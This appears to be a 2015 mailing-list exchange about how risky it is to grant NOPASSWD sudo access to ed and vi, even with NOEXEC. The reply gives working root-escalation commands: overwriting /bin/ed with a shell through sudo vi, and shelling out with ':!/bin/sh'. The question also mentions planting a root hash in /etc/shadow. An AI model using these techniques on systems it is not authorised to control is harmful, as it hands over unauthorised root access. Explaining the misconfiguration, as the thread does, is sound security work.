On 28/04/15 05:28 +1200, Carlin Bingham wrote:
On Tue, 28 Apr 2015, at 04:46 AM, whynot sudo wrote:
Hello list,
We know it's safer* to use sudoedit, but what bad things can happen if we
have the following in sudoers?
Cmnd_Alias FOO = /bin/ed, /usr/bin/ed, /usr/bin/vi
foouser LOCALHOST = NOPASSWD: NOEXEC: FOO
Can the "foouser" escape to root prompt? - of course besides that he
could now edit the /etc/shadow file to put a custom pwd hash to the root
user to become root in about 3 seconds..
Maybe some magic in .vimrc?
*=sudo vi would run as root. but sudoedit would run as the given user,
the edited file will be copied before/after editing it.
Thanks.
$ sudo vi /bin/ksh
:w! /bin/ed
:q
$ sudo ed
#
You can skip some mangling:
$ sudo vi
:!/bin/sh
#